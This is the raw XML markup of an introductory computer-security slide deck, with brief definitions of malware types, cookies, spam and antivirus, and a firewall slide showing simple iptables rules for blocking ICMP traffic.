        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p31"/>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Keylogger</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;288;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="68646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App in background can save your password</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295;p32"/>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15</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;296;p32"/>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Virus</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="68646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It is a program that replicates itself by modifying other computer programs and inserting its own code.</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298" name="Google Shape;298;p3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121800" y="2550201"/>
            <a:ext cx="4891274" cy="3491149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="299" name="Google Shape;299;p3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30575" y="2682950"/>
            <a:ext cx="3358476" cy="27164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16</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Google Shape;306;p33"/>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Spyware</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Google Shape;307;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="68646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Is unwanted software that infiltrates your computing device, stealing your Internet usage data and sensible information.</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308" name="Google Shape;308;p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073750" y="2937300"/>
            <a:ext cx="4092700" cy="351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4"/>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17</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;315;p34"/>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Cookies</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Google Shape;316;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="40503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Files stored to save important user data for browsing the Internet, such as data from filled out forms or items added to the shopping cart in an online store.</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317" name="Google Shape;317;p3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155100" y="848925"/>
            <a:ext cx="3474867" cy="42671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5"/>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18</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;324;p35"/>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Worms</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Google Shape;325;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="40503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They work in RAM and multiply until the system is saturated.</a:t>
            </a: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326" name="Google Shape;326;p35">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2793300" y="2807400"/>
            <a:ext cx="5629275" cy="3752850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Google Shape;327;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7738500" y="2269525"/>
            <a:ext cx="395400" cy="66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6"/>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19</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Google Shape;334;p36"/>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Backdoor</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Google Shape;335;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="50328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A back door is a generally covert method of avoiding normal authentication or encryption on a computer.</a:t>
            </a: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336" name="Google Shape;336;p36">
            <a:hlinkClick r:id="rId3"/>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451450" y="2517450"/>
            <a:ext cx="4887812" cy="42671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Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>Index</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Google Shape;156;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677325" y="1779600"/>
            <a:ext cx="3824700" cy="1526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ca-ES"/>
              <a:t>IEEE 7492/2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>Access control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>Integrity</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>Non Repudiation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>Dark techniques </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>Ransom ware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>Phishing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>DDos</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>0 Day</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>Spoofing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>Processor Vulnerabilities </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p19"/>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a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677302" y="1317925"/>
            <a:ext cx="87123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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1828800"/>
            <a:ext cx="3436800" cy="3755700"/>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Malware</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Virus</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Spyware</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Cookies</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Worms</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Backdoor</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Trojans</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spam</a:t>
            </a:r>
            <a:endParaRPr sz="16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Antivirus</a:t>
            </a:r>
            <a:endParaRPr sz="16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Firewall</a:t>
            </a:r>
            <a:endParaRPr sz="16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Wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ca-ES" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(WEP,WPA,WPA2-PSK WPA-PSK)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Good practices in user accounts</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="3F3F3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20</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Google Shape;343;p37"/>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Trojans</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Google Shape;344;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="36975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Is a type of malware that is often disguised as legitimate software. Once activated, Trojans can enable cyber-criminals to spy on you, steal your sensitive data, and gain backdoor access to your system</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345" name="Google Shape;345;p3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18775" y="1621812"/>
            <a:ext cx="3970492" cy="42671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21</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;p38"/>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Spam</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Google Shape;353;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="79947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Spam is any kind of unwanted, unsolicited digital communication that gets sent out in bulk. Often spam is sent via email, but it can also be distributed via text messages, phone calls, or social media.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just"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354" name="Google Shape;354;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4481900" y="3765225"/>
            <a:ext cx="3810000" cy="2676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a:t>Antivirus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Google Shape;361;p39"/>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22</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Google Shape;362;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="34530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accent1"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software with a malware database.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Functions:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevent</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detect</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove</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363" name="Google Shape;363;p3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221275" y="1320900"/>
            <a:ext cx="3382489" cy="3806062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="364" name="Google Shape;364;p3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83648" y="3795500"/>
            <a:ext cx="2672850" cy="250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a:t>Firewall</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Google Shape;371;p40"/>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23</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="372" name="Google Shape;372;p4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126500" y="679200"/>
            <a:ext cx="5286850" cy="2753250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Google Shape;373;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="29376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accent1"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is a network security system based in rules.</a:t>
            </a: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374" name="Google Shape;374;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000575" y="4466050"/>
            <a:ext cx="4068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-A to add</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>-D to delete</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>-s Source</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>-p Protocol</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>-j Action to do</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Google Shape;375;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524400" y="3940975"/>
            <a:ext cx="40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iptables -A INPUT -s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0.0.0.0/0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t> -p icmp -j DROP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524400" y="4158225"/>
            <a:ext cx="40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iptables -D INPUT -s 0.0.0.0/0 -p icmp -j DROP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="377" name="Google Shape;377;p4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81525" y="2904450"/>
            <a:ext cx="4343400" cy="30737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ca-ES"/>
              <a:t>Wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ca-ES" sz="2900"/>
              <a:t>(WEP,WPA,WPA-PSK WPA2-PSK)</a:t>
            </a:r>
            <a:endParaRPr sz="29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84" name="Google Shape;384;p41"/>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24</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
